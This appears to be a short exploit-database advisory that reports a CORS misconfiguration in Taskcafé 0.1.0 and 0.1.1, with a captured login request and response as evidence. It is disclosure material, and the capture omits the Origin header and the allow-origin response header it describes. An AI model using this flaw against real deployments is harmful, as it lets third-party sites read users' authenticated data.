#Exploit Title: Taskcafé 0.1.0 and 0.1.1- Cross-Origin Resource Sharing  
#Date: 2020- 09- 02  
#Exploit Author: Mufaddal Masalawala  
#Vendor Homepage:  
#Software Link:  
#Version: 0.1.0 and 0.1.1  
#Tested on: Kali Linux 2020.3  
The web application fails to properly validate the Origin header  
and returns the header Access-Control-Allow-Credentials: true. In this  
configuration any website can issue requests made with user credentials and  
read the responses to these requests. Trusting arbitrary origins  
effectively disables the same-origin policy, allowing two-way interaction  
by third-party web sites.  
POST /auth/login HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)  
Gecko/20100101 Firefox/80.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 43  
Connection: close  
Cookie: refreshToken=c00f94f3-c151-4e13-8084-ea160d94e584  
HTTP/1.1 200 OK  
Access-Control-Allow-Credentials: true  
Access-Control-Expose-Headers: Link  
Content-Type: application/json  
Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu,  
03 Sep 2020 04:22:10 GMT; HttpOnly  
Vary: Origin  
Date: Wed, 02 Sep 2020 04:22:10 GMT  
Content-Length: 271  
Connection: close